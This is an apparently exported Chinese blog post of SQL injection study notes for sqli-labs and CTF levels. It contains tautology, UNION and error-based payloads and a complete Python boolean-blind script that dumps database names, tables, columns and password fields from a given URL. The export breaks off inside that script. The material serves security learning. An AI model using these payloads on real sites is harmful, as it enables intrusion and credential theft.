{"id":148,"date":"2021-06-16T22:00:17","date_gmt":"2021-06-16T14:00:17","guid":{"rendered":"http:\/\/101.34.19.194\/?p=148"},"modified":"2024-02-20T21:12:24","modified_gmt":"2024-02-20T13:12:24","slug":"148","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=148","title":{"rendered":"SQL\u6ce8\u5165"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u5c0f\u77e5\u8bc6\u70b9<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u7cfb\u7edf\u51fd\u6570<\/h3>\n\n\n\n<p>version()\u2014\u2014MySQL \u7248\u672c user()\u2014\u2014\u6570\u636e\u5e93\u7528\u6237\u540d database()\u2014\u2014\u6570\u636e\u5e93\u540d @@datadir\u2014\u2014\u6570\u636e\u5e93\u8def\u5f84 @@version_compile_os\u2014\u2014\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5b57\u7b26\u4e32\u8fde\u63a5\u51fd\u6570<\/h3>\n\n\n\n<p>1.concat(str1,str2,\u2026)\u2014\u2014\u6ca1\u6709\u5206\u9694\u7b26\u5730\u8fde\u63a5\u5b57\u7b26\u4e32 2.concat_ws(separator,str1,str2,\u2026)\u2014\u2014\u542b\u6709\u5206\u9694\u7b26\u5730\u8fde\u63a5\u5b57\u7b26\u4e32 3.group_concat(str1,str2,\u2026)\u2014\u2014\u8fde\u63a5\u4e00\u4e2a\u7ec4\u7684\u6240\u6709\u5b57\u7b26\u4e32\uff0c\u5e76\u4ee5\u9017\u53f7\u5206\u9694\u6bcf\u4e00\u6761\u6570\u636e \u8bf4\u7740\u6bd4\u8f83\u62bd\u8c61\uff0c\u5176\u5b9e\u4e5f\u5e76\u4e0d\u9700\u8981\u8be6\u7ec6\u4e86\u89e3\uff0c\u77e5\u9053\u8fd9\u4e09\u4e2a\u51fd\u6570\u80fd\u4e00\u6b21\u6027\u67e5\u51fa\u6240\u6709\u4fe1\u606f\u5c31\u884c\u4e86\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6ce8\u5165\u9700\u8981\u7528\u5230\u7684\u51fd\u6570<\/h3>\n\n\n\n<p>Length() \/\/\u8fd4\u56de\u5b57\u7b26\u4e32\u7684\u957f\u5ea6 eg:Length(abc) \/\/\u8fd4\u56de3\uff0c\u8868\u793aabc\u5b57\u7b26\u4e32\u957f\u5ea6\u4e3a3<\/p>\n\n\n\n<p>Substr() \/\/\u622a\u53d6\u5b57\u7b26\u4e32 eg:substr(abc,1,1) \/\/\u8fd4\u56dea,\u4eceabc\u7684\u7b2c\u4e00\u4f4d\u5f00\u59cb\u622a\uff0c\u6b65\u957f\u4e3a1<\/p>\n\n\n\n<p>mid() \/\/\u53d6\u51fa\u5b57\u7b26\u4e32\u7684\u4e00\u90e8\u5206\u503c eg:mid(abc,1,1) \/\/\u8fd4\u56dea\uff0c\u4ece\u7684\u7b2c\u4e00\u4f4d\u5f00\u53d6\uff0c\u6b65\u957f\u4e3a1\uff0c\u4e0esubstr()\u7528\u6cd5\u4e00\u81f4<\/p>\n\n\n\n<p>left() \/\/\u53d6\u51fa\u5b57\u7b26\u4e32\u5de6\u8fb9\u7684\u51e0\u4e2a\u6570\u636e eg:left(abc,1) \/\/\u8fd4\u56dea left(abc,2) \/\/\u8fd4\u56deab<\/p>\n\n\n\n<p>right() \/\/\u53d6\u51fa\u53f3\u8fb9\u7684\u51e0\u4e2a\u6570\u636e eg:right(abc,1) \/\/\u8fd4\u56dec left(abc,2) \/\/\u8fd4\u56debc<\/p>\n\n\n\n<p>ord()\u4e0eascii() \/\/\u8fd4\u56de\u4e00\u4e2a\u5b57\u7b26\u7684ASCII\u7801\u503c eg:ascii(s) \/\/\u8fd4\u56de114<\/p>\n\n\n\n<p>hex() \/\/\u8fd4\u56de16\u8fdb\u5236\u6570<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4e00\u822c\u7528\u4e8e\u66ff\u6362\u7684\u8bed\u53e5<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>or 1=1\u2013+<\/p>\n\n\n\n<p> &#8216;or 1=1\u2013+<\/p>\n\n\n\n<p> &#8220;or 1=1\u2013+<\/p>\n\n\n\n<p> )or 1=1\u2013+<\/p>\n\n\n\n<p> &#8216;)or 1=1\u2013+<\/p>\n\n\n\n<p> &#8220;) or 1=1\u2013+<\/p>\n\n\n\n<p> &#8220;))or 1=1\u2013+<\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">union \u64cd\u4f5c\u7b26<\/h3>\n\n\n\n<p>UNION \u64cd\u4f5c\u7b26\u7528\u4e8e\u5408\u5e76\u4e24\u4e2a\u6216\u591a\u4e2a SELECT \u8bed\u53e5\u7684\u7ed3\u679c\u96c6\u3002\u4f46\u662fUNION \u5185\u90e8\u7684 SELECT \u8bed\u53e5\u5fc5\u987b\u62e5\u6709\u76f8\u540c\u6570\u91cf\u7684\u5217\uff0c\u5217\u4e5f\u5fc5\u987b\u62e5\u6709\u76f8\u4f3c\u7684\u6570\u636e\u7c7b\u578b\u3002\u540c\u65f6\u6bcf\u6761 SELECT \u8bed\u53e5\u4e2d\u7684 \u5217\u7684\u987a\u5e8f\u5fc5\u987b\u76f8\u540c\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5176\u4ed6<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">extractvalue(1,concat(0x7e,(select @@version),0x7e)) <br>--+ mysql \u5bf9 xml \u6570\u636e\u8fdb \u884c\u67e5\u8be2\u548c\u4fee\u6539\u7684 xpath \u51fd\u6570\uff0cxpath \u8bed\u6cd5\u9519\u8bef<br>updatexml(1,concat(0x7e,(select @@version),0x7e),1)<br>--+ mysql \u5bf9 xml \u6570\u636e\u8fdb\u884c \u67e5\u8be2\u548c\u4fee\u6539\u7684 xpath \u51fd\u6570\uff0cxpath \u8bed\u6cd5\u9519\u8bef<br>select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;<br>--+ mysql \u91cd\u590d\u7279\u6027\uff0c\u6b64\u5904\u91cd\u590d\u4e86 version\uff0c\u6240\u4ee5\u62a5\u9519<br>select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5b57\u7b26\u578b\u6ce8\u5165<\/h2>\n\n\n\n<p>sqli-labs \u7b2c\u4e00\u5173<\/p>\n\n\n\n<p>\u624b\u5de5\u6ce8\u5165<\/p>\n\n\n\n<ul>\n<li>\u5224\u65ad\u6ce8\u5165\u70b91&#8242; or 1=1 &#8211;+\u6b63\u5e38\u56de\u663e\u5b58\u5728\u6ce8\u5165\u70b9<\/li>\n\n\n\n<li>\u83b7\u53d6\u5b57\u6bb5\u65701 order by 1,2,3 &#8211;+\u4e00\u4e2a\u4e2a\u5c1d\u8bd5\uff0c\u76f4\u5230\u62a5\u9519\u7684\u524d\u4e00\u4e2a\u4e3a\u5b58\u5728\u5b57\u6bb5\u6570<\/li>\n\n\n\n<li>\u8054\u5408\u6ce8\u5165<\/li>\n\n\n\n<li><\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u8868\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u5217\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-1'union select id,username,password from ctfshow_user --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6570\u5b57\u578b\u6ce8\u5165<\/h2>\n\n\n\n<p>sqli-labs \u7b2c\u4e8c\u5173<\/p>\n\n\n\n<p>\u624b\u5de5\u6ce8\u5165<\/p>\n\n\n\n<p>\u6570\u5b57\u578b\u6ce8\u5165\u6570\u5b57\u540e\u4e0d\u8ddf\u5355\u5f15\u53f7&#8217;<\/p>\n\n\n\n<ul>\n<li>\u5224\u65ad\u6ce8\u5165\u70b91 or 1=1 &#8211;+\u6b63\u5e38\u56de\u663e\u5b58\u5728\u6ce8\u5165\u70b9<\/li>\n\n\n\n<li>\u83b7\u53d6\u5b57\u6bb5\u65701 order by 1,2,3 &#8211;+\u4e00\u4e2a\u4e2a\u5c1d\u8bd5\uff0c\u76f4\u5230\u62a5\u9519\u7684\u524d\u4e00\u4e2a\u4e3a\u5b58\u5728\u5b57\u6bb5\u6570<\/li>\n\n\n\n<li>\u8054\u5408\u6ce8\u5165<\/li>\n<\/ul>\n\n\n\n<ul>\n<li><\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>  -1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u8868\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  -1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u5217\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  -1 union select id,username,password from ctfshow_user --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5e03\u5c14\u76f2\u6ce8<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>\u5e03\u5c14\u578b\u76f2\u6ce8\u662f\u7531\u4e8e\u9875\u9762\u63d0\u4ea4\u6570\u636e\u5728\u4e0e\u6570\u636e\u4ea4\u4e92\u662f\u5b8c\u5168\u6ca1\u6709\u5728\u9875\u9762\u4e0a\u51fa\u73b0\u56de\u663e\u6570\u636e\uff0c\u53ea\u4f1a\u51fa\u73b0\u6570\u636e\u63d0\u4ea4\u6b63\u786e\u548c\u9519\u8bef\u4fe9\u79cd\u4e0d\u540c\u9875\u9762\uff08\u62a5\u9519\u578b\u81f3\u5c11\u8bed\u6cd5\u9519\u8bef\u4f1a\u56de\u663e\u9519\u8bef\u5728\u9875\u9762\u4e0a\uff09\u6216\u8005\u65e0\u6cd5\u4f7f\u7528\u8054\u5408\u67e5\u8be2\u3002<\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">\u811a\u672c GET\u65b9\u5f0f<\/h3>\n\n\n\n<ul>\n<li>\u5224\u65ad\u6ce8\u5165\u65b9\u5f0f\uff08\u5355\u5f15\u53f7\u6216\u53cc\u5f15\u53f7\uff09?id=1&#8242; and (length(database()))&gt;1 &#8211;+<\/li>\n\n\n\n<li>\u6839\u636e\u9875\u9762\u56de\u663e\u4fee\u6539payload\uff0c\u6839\u636e\u9875\u9762\u56de\u663e\u6539word\u4e3a&#8217;You are in&#8230;..&#8217;<\/li>\n\n\n\n<li>\u7528\u811a\u672c\u8dd1<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\"># -*- coding:utf-8 -*-<br># Author: mochu7<br>import requests<br>\u200b<br>\u200b<br>def ascii_str(): &nbsp;# \u751f\u6210\u5e93\u540d\u8868\u540d\u5b57\u7b26\u6240\u5728\u7684\u5b57\u7b26\u5217\u8868\u5b57\u5178<br> &nbsp; &nbsp;str_list = []<br> &nbsp; &nbsp;for i in range(33, 127): &nbsp;# \u6240\u6709\u53ef\u663e\u793a\u5b57\u7b26<br> &nbsp; &nbsp; &nbsp; &nbsp;str_list.append(chr(i))<br> &nbsp; &nbsp;# print('\u53ef\u663e\u793a\u5b57\u7b26\uff1a%s'%str_list)<br> &nbsp; &nbsp;return str_list &nbsp;# \u8fd4\u56de\u5b57\u7b26\u5217\u8868<br>\u200b<br>\u200b<br>def db_length(url, str):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u6d4b\u8bd5\u6570\u636e\u5e93\u540d\u957f\u5ea6.......\")<br> &nbsp; &nbsp;num = 1<br> &nbsp; &nbsp;while True:<br> &nbsp; &nbsp; &nbsp; &nbsp;db_payload = url + \"' and (length(database())=%d)--+\" % num<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(db_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_length = num<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"[+]\u6570\u636e\u5e93\u957f\u5ea6\uff1a%d\\n\" % db_length)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_name(db_length) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u6d4b\u8bd5\u5e93\u540d<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;num += 1<br>\u200b<br>\u200b<br>def db_name(db_length):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u6d4b\u8bd5\u6570\u636e\u5e93\u540d.......\")<br> &nbsp; &nbsp;db_name = ''<br> &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp;for i in range(1, db_length + 1):<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in str_list:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_payload = url + \"' and (ord(mid(database(),%d,1))='%s')--+\" % (i, ord(j))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(db_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_name += j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"[+]\u6570\u636e\u5e93\u540d\uff1a%s\\n\" % db_name)<br> &nbsp; &nbsp;tb_piece(db_name) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u6d4b\u8bd5security\u6570\u636e\u5e93\u6709\u51e0\u5f20\u8868<br> &nbsp; &nbsp;return db_name<br>\u200b<br>\u200b<br>def tb_piece(db_name):<br> &nbsp; &nbsp;print(\"\u5f00\u59cb\u6d4b\u8bd5%s\u6570\u636e\u5e93\u6709\u51e0\u5f20\u8868........\" % db_name)<br> &nbsp; &nbsp;for i in range(100): &nbsp;# \u731c\u89e3\u5e93\u4e2d\u6709\u591a\u5c11\u5f20\u8868\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp;tb_payload = url + \"' and %d=(select count(table_name) from information_schema.tables where table_schema='%s')--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp;i, db_name)<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(tb_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_piece = i<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"[+]%s\u5e93\u4e00\u5171\u6709%d\u5f20\u8868\\n\" % (db_name, tb_piece))<br> &nbsp; &nbsp;tb_name(db_name, tb_piece) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u731c\u89e3\u8868\u540d<br>\u200b<br>\u200b<br>def tb_name(db_name, tb_piece):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u731c\u89e3\u8868\u540d.......\")<br> &nbsp; &nbsp;table_list = []<br> &nbsp; &nbsp;for i in range(tb_piece):<br> &nbsp; &nbsp; &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp; &nbsp; &nbsp;tb_length = 0<br> &nbsp; &nbsp; &nbsp; &nbsp;tb_name = ''<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(1, 20): &nbsp;# \u8868\u540d\u957f\u5ea6\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_payload = url + \"' and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(tb_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_length = j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"\u7b2c%d\u5f20\u8868\u540d\u957f\u5ea6\uff1a%s\" % (i + 1, tb_length))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for k in range(1, tb_length + 1): &nbsp;# \u6839\u636e\u8868\u540d\u957f\u5ea6\u8fdb\u884c\u622a\u53d6\u5bf9\u6bd4<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for l in str_list:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_payload = url + \"' and (select ord(mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, k, ord(l))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(tb_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_name += l<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"[+]\uff1a%s\" % tb_name)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;table_list.append(tb_name)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"\\n[+]%s\u5e93\u4e0b\u7684%s\u5f20\u8868\uff1a%s\\n\" % (db_name, tb_piece, table_list))<br> &nbsp; &nbsp;column_num(table_list, db_name) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570<br>\u200b<br>\u200b<br>def column_num(table_list, db_name):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570\uff1a.......\")<br> &nbsp; &nbsp;column_num_list = []<br> &nbsp; &nbsp;for i in table_list:<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(30): &nbsp;# \u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570\u91cf\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_payload = url + \"' and %d=(select count(column_name) from information_schema.columns where table_name='%s')--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;j, i)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(column_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_num = j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_num_list.append(column_num) &nbsp;# \u628a\u6240\u6709\u8868\u7684\u5b57\u6bb5\uff0c\u4f9d\u6b21\u653e\u5165\u8fd9\u4e2a\u5217\u8868\u5f53\u4e2d<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"[+]%s\u8868\\t%s\u4e2a\u5b57\u6bb5\" % (i, column_num))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"\\n[+]\u8868\u5bf9\u5e94\u7684\u5b57\u6bb5\u6570\uff1a%s\\n\" % column_num_list)<br> &nbsp; &nbsp;column_name(table_list, column_num_list, db_name) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u540d<br>\u200b<br>\u200b<br>def column_name(table_list, column_num_list, db_name):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u540d.......\")<br> &nbsp; &nbsp;column_length = []<br> &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp;column_name_list = []<br> &nbsp; &nbsp;for t in range(len(table_list)): &nbsp;# t\u5728\u8fd9\u91cc\u4ee3\u8868\u6bcf\u5f20\u8868\u7684\u5217\u8868\u7d22\u5f15\u4f4d\u7f6e<br> &nbsp; &nbsp; &nbsp; &nbsp;print(\"\\n[+]%s\u8868\u7684\u5b57\u6bb5\uff1a\" % table_list[t])<br> &nbsp; &nbsp; &nbsp; &nbsp;for i in range(column_num_list[t]): &nbsp;# i\u8868\u793a\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570\u91cf<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_name = ''<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for j in range(1, 21): &nbsp;# j\u8868\u793a\u6bcf\u4e2a\u5b57\u6bb5\u7684\u957f\u5ea6<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_name_length = url + \"' and %d=(select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;j - 1, table_list[t], i)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(column_name_length)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_length.append(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for k in str_list: &nbsp;# k\u8868\u793a\u6211\u4eec\u731c\u89e3\u7684\u5b57\u7b26\u5b57\u5178<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_payload = url + \"' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;table_list[t], i, j, ord(k))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(column_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_name += k<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print('[+]\uff1a%s' % column_name)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_name_list.append(column_name)<br> &nbsp; &nbsp;# print(column_name_list)#\u8f93\u51fa\u6240\u6709\u8868\u4e2d\u7684\u5b57\u6bb5\u540d\u5230\u4e00\u4e2a\u5217\u8868\u4e2d<br> &nbsp; &nbsp;dump_data(table_list, column_name_list, db_name) &nbsp;# \u8fdb\u884c\u6700\u540e\u4e00\u6b65\uff0c\u8f93\u51fa\u6307\u5b9a\u5b57\u6bb5\u7684\u6570\u636e<br>\u200b<br>\u200b<br>def dump_data(table_list, column_name_list, db_name):<br> &nbsp; &nbsp;print(\"\\n[-]\u5bf9%s\u8868\u7684%s\u5b57\u6bb5\u8fdb\u884c\u7206\u7834.......\\n\" % (table_list[3], column_name_list[9:12]))<br> &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp;for i in column_name_list[9:12]: &nbsp;# id,username,password\u5b57\u6bb5<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(101): &nbsp;# j\u8868\u793a\u6709\u591a\u5c11\u6761\u6570\u636e\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_num_payload = url + \"' and (select count(%s) from %s.%s)=%d--+\" % (i, db_name, table_list[3], j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(data_num_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_num = j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp;print(\"\\n[+]%s\u8868\u4e2d\u7684%s\u5b57\u6bb5\u6709\u4ee5\u4e0b%s\u6761\u6570\u636e\uff1a\" % (table_list[3], i, data_num))<br> &nbsp; &nbsp; &nbsp; &nbsp;for k in range(data_num):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_len = 0<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;dump_data = ''<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for l in range(1, 21): &nbsp;# l\u8868\u793a\u6bcf\u6761\u6570\u636e\u7684\u957f\u5ea6\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_len_payload = url + \"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, db_name, table_list[3], k, l)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(data_len_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str not in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_len = l - 1<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for x in range(1, data_len + 1): &nbsp;# x\u8868\u793a\u6bcf\u6761\u6570\u636e\u7684\u5b9e\u9645\u8303\u56f4\uff0c\u4f5c\u4e3amid\u622a\u53d6\u7684\u8303\u56f4<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for y in str_list:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_payload = url + \"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, db_name, table_list[3], k, x, ord(y))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(data_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;dump_data += y<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print('[+]%s' % dump_data) 